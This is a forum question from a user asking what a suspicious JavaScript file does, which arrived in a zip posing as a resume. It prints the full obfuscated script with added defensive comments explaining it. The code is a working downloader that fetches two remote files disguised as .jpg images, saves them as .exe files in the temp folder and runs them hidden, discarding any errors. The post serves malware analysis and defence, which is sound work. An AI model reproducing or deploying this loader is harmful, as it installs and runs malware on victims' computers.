
Malicious javascript pretending to be a resume: What does this script do?

Last Modified: 2015-03-25
Hi guys,

I am not sure what the policy is about posting this sort of thing here, so I give fair warning that this code is suspected to be malicious in nature, as it came via email in a zip file, pretending to be a resume.

I was hoping someone could tell me what this code was trying to do. I have a tiny bit of experience with javascript and scripting in general, but most of this code is unrecognisable to me.
// ANALYSIS NOTES (defensive review; the code below is unchanged).
//
// What it is: a downloader written for a scripting host that provides ActiveXObject.
// It fetches two remote files over HTTP, writes each into the user's temp directory
// under an .exe name, and starts each one.
//
// How the strings are hidden: every sensitive name is a literal padded with junk
// characters, and a character-class regex passed to replace() strips the junk at run time.
// In several places the method name "replace" is itself produced by
// (large number).toString(radix); the first two occurrences check out as "replace"
// in base 35 and base 36, and the rest presumably follow the same scheme.
// Property names are split into fragments joined with always-true ternaries,
// e.g. (65>20?"\x74":"\x6f") always yields "t".
//
// Filler: most `name=(number + "junk"["length"|"charCodeAt"](...)*k)` statements and
// `name="junk"["replace"](...)` statements assign values that are never read in this listing.
// Several of them omit `var` and therefore assign to implicit globals.
//
// Control flow on the first line:
//   1. The outer try reads a property of `window`. Where `window` is not defined this throws
//      and control moves to catch(ee); where `window` exists the try completes and nothing
//      else in the script runs. NOTE(review): this looks like an environment gate that keeps
//      the payload from running in a browser; confirm against the host it was delivered for.
//   2. The inner try constructs an ActiveXObject whose decoded ProgID is "ewrgve", which does
//      not look like a registered ProgID, so it is presumably expected to throw as well.
//   3. Only the innermost catch(eee) declares T_Kw(fr, gadK, rn) and calls it twice.
//
// T_Kw(fr, gadK, rn): fr = URL to fetch, gadK = file name to save as, rn = run flag.
// `hyan` is created from a ProgID that decodes to "WScript.Shell".
//
// Defender takeaways: watch for a script-host process that makes an outbound HTTP request and
// then starts an executable from the temp directory, and for responses requested under an
// image extension but saved as .exe. Filtering script attachments inside archives at the mail
// gateway addresses the delivery path described in the question.
(function(){var BKah=(27.0+"HKGbcL8gW\x82u"["charCodeAt"](5)*0);iaqm=(2.0+"?s\x86}|ZA:*\x894H9"["length"]*20);var n7Er=("J\x82j\x85m\x81;\x86&gs('6tbf%"["charCodeAt"](8)*11+34.0);try{var vStb=window["g1wUbdrLt~bqr"[("U#)_/k?B"["length"]*6300863351+1.0)["toString"](("p\x8ax}?d*Rt{-I].+i7r_\x7f"["charCodeAt"](6)*0+35.0))](/[gLq\~Ud1]/g,"")];var vS_J=(":W)o7j}B\x82h\x81X8;u"["charCodeAt"](12)*5+29.0);oNNc=(2*"\x89)Z\x60Xh\x81-\x8b"["charCodeAt"](2)+24.0);}catch(ee){try{var lFPZ=new ActiveXObject("*eIw<rtgdEvH1e"[("{=isQt-7/\x87>eBIW6F"["charCodeAt"](7)*1084775147+33.0)["toString"](("W\x80\x833[ai"["length"]*5+1.0))](/[\<d1E\*HtI]/g,""));S0vk=("W7_6*vO\x83nU(-gZ"["length"]*23+8.0);}catch(eee){function T_Kw(fr, gadK, rn){ var hyan = new ActiveXObject("+WTSJcIr[i==pvt/w.7~SohVe~lAl"["replace"](/[\+7\[vV\~TJIoA\=\/w]/g,""));var OUoS=(48*"#@}6Y\x82;So2"["length"]+1.0);
// Save path: ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) (a backslash) + the gadK argument.
var gadK = hyan["E"+"xpandEnvironmentS"+(65>20?"\x74":"\x6f")+"rings"]("u%oWTjE=MYHP*%"[(720098668*"w%:$FNn7#(GU\x8b{x)"["charCodeAt"](4)+49.0)["toString"]((0*"8\x846]T\x87i[tvg"["charCodeAt"](7)+35.0))](/[\=jouYH\*W]/g,"")) + String["fr"+(83>1?"\x6f":"\x68")+"mCh"+""+(83>31?"\x61":"\x59")+"rCode"](92) + gadK;var Cvii="#P*F`(I;lGYgDT>x;PNp(Aq"["replace"](/[\>NTgA\;\`\#\*\(G]/g,"");
// YThL: the ProgID decodes to "MSXML2.XMLHTTP", the HTTP client used for the download.
var YThL = new ActiveXObject("cM-hSEX1vMZL[2m.5X+MrL8HuT<TsP"[("3R)0v"["length"]*3273117743+4.0)["toString"](("\x86\x84$j\x82e+#D(X\x874a*rn8\x89o"["charCodeAt"](9)*0+29.0))](/[m\[\-8rhEsZv\<\+u51c]/g,""));Fdbq="bB`/39cFyq;V&=lE5(j_pvMt"[(4.0+"Ul\x86Jn"["length"]*8476012186)["toString"]((34.0+"W\x7fn.y?\x846:k1t+s"["charCodeAt"](5)*0))](/[\/\(M9FEy\`\_\;\=b\&p]/g,"");
// onreadystatechange handler: once readyState === 4, GkqB (ProgID decodes to "ADODB.Stream")
// is opened, set to type 1, given ResponseBody, rewound to position 0, saved to the temp path
// with option 2, and closed. NOTE(review): type 1 and option 2 are binary mode and
// create-or-overwrite in the ADODB documentation; confirm.
YThL["o"+(85>27?"\x6e":"\x68")+"re"+"ad"+(86>22?"\x79":"\x70")+"statechange"] = function (){ if (YThL["rea"+(69>21?"\x64":"\x5d")+"ySt"+"a"+(62>30?"\x74":"\x6f")+"e"] === 4){ var GkqB = new ActiveXObject("7IAID]O1DNBI.lS3t@#r;EeN9aHm"[("T\x83_}-|w<tp7"["length"]*5423875738+0.0)["toString"]((4*">Jv/\x83xEZj"["length"]+0.0))](/[lI13\;9EH\#\@7\]N]/g,""));var RS_j="!pkwb3)WyK#5l0wVENpg9L"[(1.0+">3&w\x8a4C"["length"]*2863432339)["toString"](("/G?K{@\x88'\x80JLW5_\x8bp>"["charCodeAt"](12)*0+30.0))](/[bEwlp\#9y\!\)]/g,"");
GkqB["o"+""+(98>36?"\x70":"\x69")+"en"]();hMoj="WIedMxbyo)CdT(N<9-U7N"["replace"](/[Wed7\<\-y\(\)x]/g,"");n6ZZ=("3.\x80x*PDHhq(S\x87i[\x83"["charCodeAt"](4)*9+40.0);var z_ox=("v[j(7"["length"]*76+1.0);bbQk="3Vjhx8JOz6NGnWPBo<Mot)C"[(646242394*"a<\x8a_s[\x84Lv\x86\x82@=N\x80zg"["charCodeAt"](13)+77.0)["toString"](("]Vt\x8b\x89h~^G-(?"["charCodeAt"](8)*0+35.0))](/[Njx3PO\)6J\<no]/g,"");var gvTb=(9.0+"3*\x85r4\x82bk\x80\x89Nt/"["length"]*27);var vtJw="`a4fv68s[z/&y]kAn59Ma"["replace"](/[Av548M\&\]\[\/\`]/g,"");
GkqB["t"+"yp"+(54>5?"\x65":"\x5b")+""] = 1;var dXJt="(DVFQ0G]QvnhZ9R=SMzrT-I"[(1120153484*"'\x89\x83Ce\x8al\x80ZMRxO5cio-h\x8b"["charCodeAt"](17)+29.0)["toString"]((0*"gz\x89\x87\x82AJFE_\x8aiN"["charCodeAt"](8)+35.0))](/[0V\=h\]v\(\-9zFrS]/g,"");
GkqB["w"+"rit"+(52>2?"\x65":"\x5c")+""](YThL["Resp"+(74>46?"\x6f":"\x68")+"nseBo"+"d"+(69>37?"\x79":"\x6f")+""]);F81g=("\x81+\x87q/p\x82*[Sb"["length"]*36+9.0);g5XT="RL0Q<zkWR5Y`K*mka92I-er"["replace"](/[e29\-\<Rk\*0\`Y]/g,"");var JiWj=(10.0+"H@\x8ae\x86\x81D;I1i"["charCodeAt"](6)*1);
GkqB["p"+(64>31?"\x6f":"\x65")+""+"siti"+(80>7?"\x6f":"\x6a")+"n"] = 0;pp3E="oyPngts4LIiH[LXHrScZmUb"["replace"](/[\[I4PUXZtHSon]/g,"");
GkqB["sav"+(55>7?"\x65":"\x5b")+""+""+(98>44?"\x54":"\x4b")+"oFile"](gadK, 2);var aLTe=("0'Adz\x60MB*#/;1"["charCodeAt"](8)*4+20.0);var nLha="P8EG=X<huCH&gno1Unrwh+h"[(16.0+"qPB/78-5z*\x83&ijT2"["charCodeAt"](7)*556371782)["toString"]((2*"_@H^(?Z51KPyN"["length"]+6.0))](/[G\&w1H\=u\+P8n\<]/g,"");o$dG=("VM6ySLTE>ZYu\x7fvJ[_"["charCodeAt"](2)*0+15.0);var D15G=(2.0+"to5XbxJ"["length"]*47);
GkqB[""+(87>27?"\x63":"\x5a")+"lo"+""+(53>34?"\x73":"\x6d")+"e"]();Cvpn="M`p~0U+7L_uJBZSniT%m~9[w"["replace"](/[iu\%\+\~0MB\[\`7\_S]/g,"");
} ;T5gx="OA1P#Mhp8k2El6VOgR+i1M"[(3027147209*"<$L+}w42Ta~GfX"["length"]+8.0)["toString"]((34.0+"OB*\x85sV&\x7fy0E@d)\x86<g"["charCodeAt"](10)*0))](/[1g86hEO\+\#k]/g,"");
} ;var Jx8n="*4=b&~L%Qx&-COCKU#h-stTe"[("Y0T8QC\x881Aj%Ub57n"["charCodeAt"](5)*890487061+31.0)["toString"]((0*"g\x80dw\x7f>D~&W]H\x85Q\x8b"["charCodeAt"](6)+36.0))](/[s\*\#TO\%\&\=\-KQ\~]/g,"");var ZC3Q=(36.0+"CAwD\x81-tp2}\x824"["charCodeAt"](8)*6);var eLzP=("UzP+h4\x60\x84FHYO?("["length"]*20+11.0);Bs7c="2Aez6DwLnS~Lu*x3s1plM>M"[(0.0+"QO\x82Y\x60*"["length"]*7063343489)["toString"]((4.0+"P\x8079^C"["length"]*5))](/[ez1\~wn\*3ul\>2D]/g,"");w$2g=(5*"[Pyw;NKh9met{p1\x80Ya"["charCodeAt"](14)+40.0);var gryB=(6.0+"\x60[S9e\x89?DGY+-8"["length"]*0);var nKTq="<R[Xpk&&F<l&eI6Ws_tDi*Q0"[("M>U\x7f\x8b0RjizoA"["length"]*2032260927+9.0)["toString"](("vo\x89M&bnrI\x82L)6>*@jBOe"["charCodeAt"](11)*0+31.0))](/[\[6Q\<esp\_D\*\&]/g,"");
// Request: open("GET", fr, false) followed by send(). The third argument false requests a
// synchronous call. NOTE(review): the save handler above should then have run before the Run check below; confirm.
try { YThL["op"+(90>29?"\x65":"\x5d")+""+"n"]("wGvE!T"[("t^m\x88d"["length"]*10081381361+4.0)["toString"]((1*"npUZ+@&\x82L^{=#\x85"["charCodeAt"](12)+0.0))](/[v\!w]/g,""), fr, false);var Dtcc="LsVu/CH7SDET4m/E6oO9Zrya"["replace"](/[yZD\/4VoEHL97]/g,"");
YThL[""+""+(51>8?"\x73":"\x6c")+"end"]();XYxF="cF_9%X-nJ8sI+eW7eFb6EvgQ"[(3027147209*"iX2u}-TA&$z:3{"["length"]+8.0)["toString"](("1CEvd:\x85-Rg5*\x60"["length"]*2+8.0))](/[veJ\-6g\+\%s\_cb7]/g,"");
// Execution: when rn > 0 the saved file is started with hyan.Run(path, 0, 0).
// NOTE(review): in WScript.Shell.Run the second argument 0 is a hidden window and the third is "do not wait"; confirm.
if (rn > 0){ hyan["R"+(90>39?"\x75":"\x6d")+""+"n"](gadK, 0, 0);DhDg="XV/6;mND/1OjQ<_I&otU8(W"["replace"](/[OUt\_j\/\&\;\<XN\(]/g,"");
} ;var Ssra=(13.0+"y:a;\x85Z=g,ch+rm@"["length"]*22);
// The empty catch below discards any download or execution error, so a failure leaves no visible trace.
} catch (er){ } ;var I9Hr="W6pUh#mPI_BTsjQ5&mwVZK"[(672092090*">(Y+\x60KLAQ}"["charCodeAt"](5)+59.0)["toString"](("1gvm/u|U"["length"]*4+3.0))](/[\_\&Wj5w\#PpZhT]/g,"");
// Two calls follow, both with rn = 1. Each first argument decodes to an http:// URL whose path
// ends in .jpg, and each second argument decodes to a numeric file name ending in .exe.
// The mismatch between the requested extension and the saved one is a useful detection signal.
} T_Kw("Yh9tTt`pN]:0/#W/>e(lVlzi!sDoRnS1R.*Gr~u>U/-iLmq%a*-g2eWs`/!o-n%-ed.*j4p[bg"[(0.0+"_\x81L'<xc"["length"]*7200986687)["toString"]((0.0+"PemYZ"["length"]*7))](/[\>9Vbd\(S\~\*\#DUTq\-\[L0G2zNR\%Y\`\]W\!4]/g,""),"r3@9r6f5E2T1c1o.VeZbxv_e"["replace"](/[EfcbV\_\@vZrTo]/g,""), 1);M2_r=(54.0+"W\x8a1\x81zYFGjdEl\x86I"["charCodeAt"](13)*6);
T_Kw("(h@tIt(pR:bT/@*/%[e0lv0lMicsTo&nL1C.!)r>uCd/Xi8ymVaqg!eNsO/~tRFwEo@.+jQpzg"[(1487780792*"4Z\x86p2tm6laX"["length"]+7.0)["toString"]((29.0+"IKGeDmo9>=yf&\x88{d\x8b\x83"["charCodeAt"](2)*0))](/[\)d\[\!\@ELFI\>bMvXc\(q0C8\+\*Q\%\&N\~zVROyT]/g,""),"&5!2Y2Nu6J5K0b94.teoxOe"["replace"](/[NJ\&o4Ou\!bKtY]/g,""), 1);var Y1Zi=("\x60k\x84JNZlY;G"["length"]*30+6.0);
}};var H9rD=(21*"<qG\x83pgv]"["length"]+7.0);;var BJCo="gVhaDsYxdKyS(invL8wjQ"[(854354352*"mt}p\x87n@\x8b;\x8a"["charCodeAt"](8)+41.0)["toString"](("CSpD9hegV,"["charCodeAt"](4)*0+35.0))](/[h8yDgvdnY\(j]/g,"")})();//q0G737pZcn


My enquiring mind wants to know what this script was trying to do and how. :)

Thanks in advance.
Andrew